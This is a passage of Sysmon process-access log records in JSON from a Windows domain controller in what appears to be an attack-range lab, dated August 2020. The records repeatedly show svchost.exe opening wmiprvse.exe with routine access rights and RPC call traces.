C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.396","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1047,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1048,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1049,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1050,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1051,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1052,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1053,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1054,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 